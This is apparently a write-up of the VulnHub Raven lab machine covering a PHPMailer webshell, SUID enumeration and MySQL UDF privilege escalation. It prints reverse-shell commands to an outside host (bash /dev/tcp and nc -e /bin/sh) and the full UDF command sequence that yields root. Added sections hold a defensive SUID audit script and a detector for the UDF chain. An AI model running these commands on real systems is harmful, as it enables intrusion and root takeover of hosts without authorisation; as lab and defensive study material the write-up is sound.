VulnHub (4): Raven machine (Linux UDF privilege escalation)

Search for the VulnHub (4) download link yourself.

Information gathering

Scan for the target's IP with netdiscover -i eth0; the target IP is 192.168.136.140
root@w0rk:~# dirb http://192.168.79.132/
root@w0rk:~# searchsploit phpmail 
Getting a webshell relies on PHPMailer writing a file, which leads to command execution; see "Reference 3" at the end for the details, which are not repeated here. Next comes privilege escalation. After many attempts, UDF privilege escalation succeeded. This is not well written; corrections from more experienced readers are welcome.

Tips

Reverse shell [interactive, nicer to work in]
bash -i >& /dev/tcp/192.168.146.129/2333 0>&1
Switch to an interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'
 

SUID privilege escalation

What is SUID? SUID stands for "Set owner User ID up on execution". It is an attribute Linux gives to executable files. In plain terms, when another user runs the program, it runs with the permissions of the program's owner/group. Note that privilege escalation is only possible when the program's owner is uid 0 (or another superuser) and the file also has the SUID bit set.

Finding SUID/SGID files usable for privilege escalation:
find / -perm -1000 -type d 2>/dev/null # Sticky bit - only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - runs as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - runs as the owner, not the user who started it.
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null # SGID or SUID (parentheses so -type f applies to both branches)
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (quicker search)
find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null # Starting at root (/), SGID or SUID, not symbolic links, only 3 folders deep, listed with more detail, errors hidden (e.g. permission denied)

SUID: privilege escalation via find

[find's -exec option can run commands, so when find runs as root it can be used to escalate privileges]
nmap and vim fall into the same category as find.
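As an added example (not from the original post), here is a small Python audit that parses the output of the `find ... -exec ls -ld` command above and reports root-owned SUID files that are not in an assumed baseline; the listing and the baseline are constructed for illustration.

```python
import re

# Constructed sample of what the page's last find command prints
# (find / ... -exec ls -ld {} \;); paths, sizes and dates are made up.
SAMPLE_LS = """\
-rwsr-xr-x 1 root root  59640 Mar 22  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 31  2020 /usr/bin/sudo
-rwsr-xr-x 1 root root 238080 Feb 28  2019 /usr/bin/find
-rwsr-sr-x 1 root root 282400 Dec 10  2018 /usr/bin/vim.basic
-rwxr-sr-x 1 root tty   35000 Jan  5  2019 /usr/bin/wall
"""

# Binaries that legitimately need SUID on this host (assumed baseline; adjust per image).
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su"}

# Fields: mode, links, owner, group, size, month, day, year-or-time, path
LS_LINE = re.compile(r"^(\S{10})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\S+\s+\S+\s+(.+)$")

def parse_ls_line(line):
    """Return (mode, owner, group, path) for an `ls -ld` line, or None if it does not parse."""
    m = LS_LINE.match(line)
    return m.groups() if m else None

def is_root_suid(mode, owner):
    """True when the owner-execute slot carries the SUID bit and the owner is root."""
    return owner == "root" and mode[3] in "sS"

def audit_suid(ls_output, baseline=BASELINE):
    """Root-owned SUID files not in the baseline, in the order they were listed."""
    findings = []
    for line in ls_output.splitlines():
        parsed = parse_ls_line(line)
        if parsed is None:
            continue
        mode, owner, _group, path = parsed
        if is_root_suid(mode, owner) and path not in baseline:
            findings.append(path)
    return findings

if __name__ == "__main__":
    for path in audit_suid(SAMPLE_LS):
        print("unexpected root SUID binary:", path)
```

Anything the audit reports (here find and vim, exactly the binaries the text names) should lose the bit with chmod u-s unless there is a documented reason for it.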

UDF privilege escalation

On the attacker box (Kali), run locate mysqludf to find the .so files needed for the escalation. sqlmap also ships these shared libraries, but to avoid being flagged by antivirus they are encoded and cannot be used directly. They can be decoded with sqlmap's own tool cloak.py, located at /extra/cloak/cloak.py; the decoding method is described at https://www.sqlsec.com/2020/11/mysql.html#toc-heading-21
 
Use the UDF file from the metasploit directory.
Run on the target host:
UDF privilege escalation commands:
mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.03 sec)
mysql> insert into foo values(load_file('/var/www/html/lib_mysqludf_sys_64.so'));
Query OK, 1 row affected (0.01 sec)
Find the MySQL plugin directory:
mysql> show variables like '%plugin%';
+---------------+------------------------+
| Variable_name | Value                  |
+---------------+------------------------+
| plugin_dir    | /usr/lib/mysql/plugin/ |
+---------------+------------------------+
1 row in set (0.00 sec)
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/udf.so';
Query OK, 1 row affected (0.01 sec)
 
Oops, that errored out.
Try another UDF .so file.
The 32-bit udf.so does not work. Keep trying, following https://www.cnblogs.com/zzjdbk/p/12989830.html
mysql> use mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> create function sys_exec returns string soname 'udf.so';
Query OK, 0 rows affected (0.01 sec)
mysql> select @@plugin_dir;
+------------------------+
| @@plugin_dir           |
+------------------------+
| /usr/lib/mysql/plugin/ |
+------------------------+
1 row in set (0.00 sec)
Verify:
mysql> select * from mysql.func where name = 'sys_exec';
+----------+-----+--------+----------+
| name     | ret | dl     | type     |
+----------+-----+--------+----------+
| sys_exec | 0   | udf.so | function |
+----------+-----+--------+----------+
1 row in set (0.00 sec)
 
Switch to another function, sys_eval:
Privilege escalation succeeded.
Hmm, it seems a reverse shell cannot be spawned this way.
In that case, fall back to the SUID find privilege escalation.
In practice this command was found to work well: nc -e /bin/sh 192.168.146.129 2333
mysql> select * from mysql.func;
+----------+-----+--------+----------+
| name     | ret | dl     | type     |
+----------+-----+--------+----------+
| sys_exec | 0   | udf.so | function |
| sys_eval | 0   | udf.so | function |
+----------+-----+--------+----------+
2 rows in set (0.00 sec)
mysql> select sys_eval("whoami");
+--------------------+
| sys_eval("whoami") |
+--------------------+
| root               |
+--------------------+
1 row in set (0.00 sec)
mysql> select sys_eval("nc -e /bin/sh IP PORT");
 
Summary:
1. Switch to an interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'
 
 
2. MySQL UDF privilege escalation summary:
use mysql;
create table foo(line blob);
insert into foo values(load_file('/var/www/html/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/udf.so';
create function do_system returns integer soname 'udf.so';
The functions provided are sys_eval and sys_exec (declared as returns integer / returns string); e.g. select sys_eval("whoami");
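To turn the statement sequence above into something a defender can detect, here is an added Python example (not from the original post) that reads MySQL general-query-log lines and flags any connection that writes a library into plugin_dir and then registers a function from it; the log lines are constructed to mirror the session shown above, and the log format assumed is the MySQL 5.7+ general log (time, connection id, command, argument).

```python
import re
from collections import defaultdict

# Constructed MySQL general-log lines (time, connection id, command, argument)
# mirroring the statement sequence in the session above; not a real capture.
SAMPLE_LOG = """\
2021-01-05T10:12:01.000001Z\t   12 Query\tuse mysql
2021-01-05T10:12:02.000001Z\t   12 Query\tcreate table foo(line blob)
2021-01-05T10:12:03.000001Z\t   12 Query\tinsert into foo values(load_file('/var/www/html/lib_mysqludf_sys_64.so'))
2021-01-05T10:12:04.000001Z\t   12 Query\tshow variables like '%plugin%'
2021-01-05T10:12:05.000001Z\t   12 Query\tselect * from foo into dumpfile '/usr/lib/mysql/plugin/udf.so'
2021-01-05T10:12:06.000001Z\t   12 Query\tcreate function sys_eval returns string soname 'udf.so'
2021-01-05T10:12:07.000001Z\t   12 Query\tselect sys_eval("whoami")
2021-01-05T10:12:08.000001Z\t   13 Query\tselect id, name from wp_users
2021-01-05T10:12:09.000001Z\t   13 Query\tselect load_file('/etc/hostname')
"""

LOG_LINE = re.compile(r"^\S+\t\s*(\d+) Query\t(.*)$")

# The stages of the UDF chain shown above, each as a query pattern.
STAGES = {
    "load_so":   re.compile(r"load_file\s*\(\s*'[^']*\.so'", re.I),
    "dumpfile":  re.compile(r"into\s+dumpfile\s+'[^']*/plugin/[^']*'", re.I),
    "create_fn": re.compile(r"create\s+function\s+\w+\s+returns\s+\w+\s+soname", re.I),
    "exec":      re.compile(r"\bsys_(exec|eval)\s*\(", re.I),
}

def stages_per_connection(log_text):
    """Map connection id -> set of stage tags seen in that connection's queries."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        conn, query = m.groups()
        for tag, pattern in STAGES.items():
            if pattern.search(query):
                seen[conn].add(tag)
    return dict(seen)

def udf_alerts(log_text):
    """Connections that wrote a library into plugin_dir and then registered a function from it."""
    return sorted(conn for conn, tags in stages_per_connection(log_text).items()
                  if {"dumpfile", "create_fn"} <= tags)

if __name__ == "__main__":
    for conn in udf_alerts(SAMPLE_LOG):
        print(f"connection {conn}: UDF library install chain observed")
```

The chain in this write-up only works because the MySQL account can write into plugin_dir; setting secure_file_priv and keeping plugin_dir read-only for the mysql user stops the INTO DUMPFILE step, and mysql.func can be reviewed for entries whose dl column is not a known library.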
3. Summary
References:
  1. MySQL vulnerability exploitation and privilege escalation: https://www.sqlsec.com/2020/11/mysql.html#toc-heading-27
  2. MySQL privilege escalation via UDF (with a webshell already obtained) - My_Dreams - cnblogs: https://www.cnblogs.com/zzjdbk/p/12989830.html
  3. Raven machine hands-on (Linux UDF privilege escalation) - vuluhub series (4): https://www.cnblogs.com/PANDA-Mosen/p/13189038.html

Original post: https://www.cnblogs.com/NBeveryday/p/14247222.html